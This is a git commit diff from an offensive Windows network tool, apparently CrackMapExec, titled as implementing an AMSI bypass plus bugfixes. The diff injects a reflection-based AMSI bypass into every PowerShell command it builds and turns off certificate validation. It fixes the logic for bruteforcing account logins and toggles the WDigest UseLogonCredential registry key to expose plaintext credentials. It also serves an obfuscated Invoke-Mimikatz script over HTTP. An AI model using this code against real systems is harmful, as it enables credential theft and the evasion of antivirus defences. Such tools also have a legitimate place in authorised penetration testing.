Implemented @mattifestation's AMSI bypass and multiple bugfixes
- @mattifestation's AMSI bypass now gets called before executing powershell commands or scripts - Squashed some bugs related to account bruteforcing, enumerating users and creating/deleting the UseLogonCredential reg keymain
byt3bl33d3r
parent
8ddfcb10e4
commit
6f2596902c
|
|
@ -211,10 +211,10 @@ class Connection:
|
|||
if not domain: domain = self.domain
|
||||
if self.args.domain: domain = self.args.domain
|
||||
|
||||
if credtype == 'hash' and not self.over_fail_limit():
|
||||
if credtype == 'hash' and not self.over_fail_limit(username):
|
||||
self.hash_login(domain, username, password)
|
||||
|
||||
elif credtype == 'plaintext' and not self.over_fail_limit():
|
||||
elif credtype == 'plaintext' and not self.over_fail_limit(username):
|
||||
self.plaintext_login(domain, username, password)
|
||||
|
||||
except IndexError:
|
||||
|
|
|
|||
|
|
@ -22,7 +22,7 @@ class WDIGEST:
|
|||
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
|
||||
keyHandle = ans['phkResult']
|
||||
|
||||
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00')
|
||||
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
|
||||
|
||||
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
|
||||
|
||||
|
|
@ -46,7 +46,17 @@ class WDIGEST:
|
|||
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
|
||||
keyHandle = ans['phkResult']
|
||||
|
||||
try:
|
||||
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
|
||||
except:
|
||||
self.logger.success('UseLogonCredential registry key not present')
|
||||
|
||||
try:
|
||||
remoteOps.finish()
|
||||
except:
|
||||
pass
|
||||
|
||||
return
|
||||
|
||||
try:
|
||||
#Check to make sure the reg key is actually deleted
|
||||
|
|
@ -58,3 +68,4 @@ class WDIGEST:
|
|||
remoteOps.finish()
|
||||
except:
|
||||
pass
|
||||
|
||||
|
|
|
|||
|
|
@ -60,7 +60,7 @@ class SAMRDump:
|
|||
rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
||||
rpctransport.set_dport(self.__port)
|
||||
|
||||
if hasattr(rpctransport, setRemoteHost):
|
||||
if hasattr(rpctransport, 'setRemoteHost'):
|
||||
rpctransport.setRemoteHost(self.__addr)
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
# This method exists only for selected protocol sequences.
|
||||
|
|
|
|||
|
|
@ -3,6 +3,7 @@ import string
|
|||
import re
|
||||
import cme
|
||||
import os
|
||||
import logging
|
||||
from base64 import b64encode
|
||||
from termcolor import colored
|
||||
|
||||
|
|
@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None):
|
|||
return strippedCode
|
||||
|
||||
def create_ps_command(ps_command, force_ps32=False):
|
||||
ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command
|
||||
ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
|
||||
try{{
|
||||
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
|
||||
}}catch{{}}
|
||||
{}
|
||||
""".format(ps_command)
|
||||
|
||||
logging.debug('Unincoded command:\n' + ps_command)
|
||||
|
||||
if force_ps32:
|
||||
command = """$command = '{}'
|
||||
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
|
||||
|
|
|
|||
|
|
@ -55,7 +55,7 @@ class CMEModule:
|
|||
request.send_response(200)
|
||||
request.end_headers()
|
||||
|
||||
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
|
||||
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
|
||||
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
|
||||
request.wfile.write(ps_script)
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue